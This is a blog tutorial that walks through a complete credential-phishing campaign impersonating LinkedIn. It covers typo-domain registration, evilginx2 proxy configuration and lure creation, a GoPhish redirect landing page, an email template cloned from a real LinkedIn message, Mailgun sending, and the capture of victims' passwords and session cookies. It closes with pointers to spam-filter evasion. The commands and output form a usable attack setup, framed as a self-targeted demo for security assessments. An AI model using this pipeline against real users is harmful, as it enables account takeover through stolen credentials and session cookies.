8/3/2021 The Ultimate Guide to Phishing - computer insecurities

The Ultimate Guide to Phishing

Learn how to Phish using EvilGinx2 and GoPhish

Posted by
Siddharth Balyan on August 03, 2021 · 15 mins read

Introduction
Why another Phishing guide?
Recently I’ve been able to get my hands dirty with Phishing and witness actual
Phishing campaigns due to the incredibly talented people at my workplace. To satisfy
my curiosity I tried to follow along with a small Phishing campaign against myself and
realized that, there doesn’t seem to be an all-inclusive, all-in-one guide for beginners
to understand the process and help them set up the infrastructure.

So, this is my attempt at that.

I’m going to assume the starting point that you already know what phishing is, but
would like to learn how to do it.

Note: This is simply my way of contributing to the security community. Please don’t use
this knowledge for malicious purposes!

Breakdown
The process of phishing can be split into two parts by my understanding;

https://sidb.in/2021/08/03/Phishing-0-to-100.html 1/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

The Phishing Website : This is the spoofed, fake website where the unknowing
user will enter their credentials. From here we would capture the said credentials
along with their session cookies.
The Phishing Mail: This is the email which would be sent to the victim with the
hope that they bite the bait and go to our spoofed website.

The Phishing Website

Infrastructure and Tools Used
1. Urlcrazy: A tool generating typo domains.
2. Freenom: For buying a free domain for testing/learning purposes.
3. evilginx2 : A man-in-the-middle-proxy for setting up the Phish Website which
can capture credentials.
4. Free Azure Account: Azure’s free standard VM for setting up all the
infrastructure and tools.

Getting a domain
A domain name needs to be convincing and similar enough to the domain of the
legitimate website. One can use urlcrazy or catphish to generate a list of typo
domains.

❯ urlcrazy linkedin.com

The domains marked are some examples of typo domains we can choose from. Rest
are all in use.

For demo purposes, I’m going to buy a free domain from Freenom. They offer free
domains from .tk, .ml, ga, .cf, .gq TLDs.

I’ll be buying linkdin.tk for now.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 2/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Note: Freenom is a bit buggy, so you may have to write the entire domain with TLD in
their search to be able to select and put it in your cart

We have a Phishing domain where we will have our site on.

Getting a Phishing Machine

To run evilginx2 , the man-in-the-middle HTTP Proxy. I am using an Azure B1S
Standard tier VM running Ubuntu 20.04 LTS, which I got free with my Azure for
Students subscription.

Once the VM is created, go ahead and open the ports 80, 443 and 3333 for HTTP,
HTTPS and GoPhish, which we will use later on, respectively.

Adding DNS Records

https://sidb.in/2021/08/03/Phishing-0-to-100.html 3/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Go to the DNS Management page in your Freenom Domain and add the A record for
WWW.

Configuring EvilGinx2
First install Go by following the instructions here and make sure you add it to your
$PATH.

Then, clone the repo for evilginx2 ; cd into the directory and make the binary.
Additionally, add the binary to /usr/bin or /usr/local/bin and copy the phishlets and
templates directory to /usr/share/evilginx to use the tool from any path.

❯ git clone https://github.com/kgretzky/evilginx2.git

❯ cd evilginx2

❯ make

❯ sudo cp bin/evilginx /usr/bin

❯ sudo cp -r phishlets/ /usr/share/evilginx/

❯ sudo cp -r templates /usr/share/evilginx/

Run evilginx2 and if the phishlets have been loaded successfully you should see the
tool run.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 4/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Now edit the config to add your domain and IP and the redirect URL.

: config domain linkdin.tk

[01:25:52] [inf] server domain set to: linkdin.tk

: config ip 52.172.136.70

[01:25:59] [inf] server IP set to: 52.172.136.70

: config redirect_url https://xxxx.xxxx

[02:02:52] [inf] unauthorized request redirection URL set to: https://xxxx.xxxx

Any Scanners scanning your domain without the lure parameter will automatically get
redirected to the redirect_url you set up here

We also need to set up a TLS Certificate for our domain. Luckily, the tool can handle
that for us. Do the following;

: phishlets hostname linkedin linkdin.tk

: phishlets enable linkedin

https://sidb.in/2021/08/03/Phishing-0-to-100.html 5/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Our LinkedIn phishlet is all set up!

Creating EvilGinx2 Lure

The next task is to create a lure, which would be the phishing URL to send the
victims to.

: lures create linkedin

[04:31:37] [inf] created lure with ID: 1

: lures get-url 1

https://www.linkdin.tk/BMvzCciy

We also need to add the URL the victim will get redirected to after logging in. This is
different from the config redirect_url as that one is for the scanners and unintended
users and this one is for the victims post-login.

: lures edit 1 redirect_url https://www.linkedin.com/

[04:46:06] [inf] redirect_url = 'https://www.linkedin.com/'

https://sidb.in/2021/08/03/Phishing-0-to-100.html 6/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Once that’s it, you can navigate to the lure URL to make sure it’s working

If you did everything right, you should see a LinkedIn login page!

Congratulations! You now have a Phishing Website set up!

Note: You can run evilginx2 in a tmux session so that when you quit your ssh
connection, the tool keeps on running.

The Phishing Mail

Infrastructure and Tools Used
1. GoPhish: The phishing framework used to manage users, email templates and
phishing campaigns.
2. Mailgun: The email service used to send the emails to the victims.

Installing GoPhish
https://sidb.in/2021/08/03/Phishing-0-to-100.html 7/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

GoPhish is an open-source phishing framework which makes it easy to configure, run

and track Phishing campaigns.
Install it by either downloading the binary for your
system from here, or you can build it for your system using;

❯ go get github.com/gophish/gophish

Then navigate to the directory of installation, (usually

~/go/src/github.com/gophish/gophish) and run go build. You should have a binary
called gophish in your directory.
In the same directory, there should be a file called
config.json. Here, change the listen_url from 127.0.0.1:3333 to 0.0.0.0:3333.

You can now run the binary;

sudo ./gophish

You should probably run gophish this in the same tmux session as evilginx2

The temporary credentials are printed in the logs here. Navigate to https://[your-
ip]:3333 and login using these credentials.
You are now in the GoPhish Admin Panel.

Setting up an Email Template in GoPhish

https://sidb.in/2021/08/03/Phishing-0-to-100.html 8/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

We set up and configure the email which shall be received by the victim here. To
make a convincing email template, go through your own inbox and try to find an
existing email from the website you’re trying to spoof. For my use case, I will use a
Password-Reset Confirmation Email which I received from LinkedIn.

Click on the three-dot options button and Download the Email you want to use as a
template.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 9/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Open the file and copy its contents. Now navigate to Email Templates tab and create a
new template. Here, click on Import Email and paste the copied contents here.
Optionally, check the Change Links to Point to Landing Page checkbox. This will
change all the links in the mail to point to the spoofed landing page.

Now, in the HTML tab, modify the contents to your own liking.

Crafting a convincing email is very important, so if you’re doing this for an assessment,
take your time to craft a phishing email.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 10/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

For reference, here’s my template;

Setting up the Landing Page in GoPhish

The landing page is what you want users to “land” on once they click on the link in
the email.
Once in the GoPhish admin panel, navigate to Landing Pages and create a
new page. Give it a page name and for the page content, add the following;

<html><head><script>

window.location.replace("<YOUR EVILGINX LURE URL");

</script>

</head><body></body></html>

It should look similar to this;

https://sidb.in/2021/08/03/Phishing-0-to-100.html 11/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

The phishing server runs on http:[your-ip]:80. This is the template variable for
{{.URL}}. Whenever the victim navigates to this page (through the link they will be
prompted to visit), they will get redirected to your evilginx2 lure.

Setting up Sending Profile with GoPhish and

Mailgun
Now that we have the phishing mail, the spoofed website and the all the tools, all we
need to do is send the email. For this, we will use Mailgun’s free tier user account.
Make an account at Mailgun and navigate to the sending tab. Here, in the SMTP
section, you’ll notice your SMTP credentials.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 12/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Also add Authorized Recipients. As a free tier user, only authorized recipients can
receive emails from your Mailgun account.

Now, in the Sending Profile in the GoPhish panel, make a new profile and copy your
credentials and config here as follows.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 13/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Adding Users in GoPhish

You have to add the victims in the Users & Groups section. Navigate to the section,
and you’ll see you can either do it manually or in bulk using their CSV template.

For demo purposes, I’ll be sending the mail to myself, so I’ll add my user in manually.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 14/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Creating and Launching the Campaign

All your GoPhish set up is done! Now all you have to do is create a new campaign in
the campaign section, add all the config you’ve done and launch it!

Now, it is very likely that your email has been marked as a phish and has been moved
to the Spam folder. You can go to the link in the mail, and you’ll notice something like
this;

Click proceed and look! evilginx2 has started logging all the data of the new visitor
(you).

On entering the password, you can see evilginx2 capturing the credentials and
displaying them.

https://sidb.in/2021/08/03/Phishing-0-to-100.html 15/16
8/3/2021 The Ultimate Guide to Phishing - computer insecurities

Running the sessions command will show you all the user credentials and cookies
you’ve captured, though this is out of our current scope.

Final Thoughts
Congrats! You’ve successfully understood how to run a phishing campaign, and that
too without shelling out a single rupee! Given there are a few caveats, the phishing
mail gets marked as a phishing mail, but that can be avoided by using a little
trustworthy domain and shelling out some cash for a premium Mailgun account.

Note that this is just the beginning of how you can conduct phishing assessments.
Once you proceed further, the complexity increases. Automation, spam evasion,
bypassing filters, aging your domains etc., come into play.
To get a better insight into
some of these topics, you can check out @grahamhelton3’s course on Practical
Phishing Assessments here.

Be sure to reach out to me @siddharthdotexe for any fixes or queries regarding!

Happy Hacking!

← PREVIOUS
POST


 
 
 


Copyright © Siddharth Balyan 2021

https://sidb.in/2021/08/03/Phishing-0-to-100.html 16/16